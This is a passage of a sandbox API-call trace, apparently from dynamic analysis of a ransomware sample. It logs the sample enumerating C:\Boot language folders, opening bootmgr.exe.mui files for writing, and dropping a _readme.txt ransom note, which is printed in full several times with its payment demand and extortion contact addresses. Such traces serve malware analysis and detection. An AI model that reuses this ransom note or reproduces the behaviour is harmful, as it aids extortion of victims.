lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0228.076] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.076] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.076] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.076] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7388 [0228.076] PathFindExtensionW (pszPath="C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned=".mui" [0228.076] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.076] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.076] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0228.076] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0228.076] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0228.076] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0228.076] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.077] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.077] PathFindFileNameW (pszPath="C:\\Boot\\zh-HK\\") returned="zh-HK\\" [0228.077] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.077] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.077] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.077] PathFindFileNameW (pszPath="") returned="" [0228.077] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.077] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0228.078] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0228.078] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0228.078] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.078] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a3390 [0228.078] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.078] FreeLibrary (hLibModule=0x75000000) returned 1 [0228.078] PathAppendW (in: pszPath="C:\\Boot\\zh-HK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0228.078] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.078] PathFileExistsW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 0 [0228.078] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0228.078] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0228.078] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0228.078] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0228.078] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\_readme.txt" (normalized: "c:\\boot\\zh-hk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.079] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0228.079] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.079] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7418 [0228.079] PathFindExtensionW (pszPath="C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned=".mui" [0228.079] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.079] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.079] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0228.080] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0228.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0228.080] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0228.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.080] PathFindFileNameW (pszPath="C:\\Boot\\zh-TW\\") returned="zh-TW\\" [0228.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.080] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.080] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.080] PathFindFileNameW (pszPath="") returned="" [0228.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.080] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0228.081] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0228.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0228.081] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a2b08 [0228.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.081] FreeLibrary (hLibModule=0x75000000) returned 1 [0228.081] PathAppendW (in: pszPath="C:\\Boot\\zh-TW\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0228.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.081] PathFileExistsW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 0 [0228.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0228.081] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0228.081] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0228.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0228.082] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\_readme.txt" (normalized: "c:\\boot\\zh-tw\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.082] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0228.084] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.084] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7388 [0228.084] PathFindExtensionW (pszPath="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned=".mui" [0228.084] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.085] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.085] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0228.085] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0228.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7388 [0228.085] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0228.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7418 [0228.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.085] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edbd8 [0228.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0228.085] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.085] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.085] PathFindFileNameW (pszPath="") returned="" [0228.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7418 [0228.085] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0228.086] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0228.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0228.086] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a3390 [0228.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 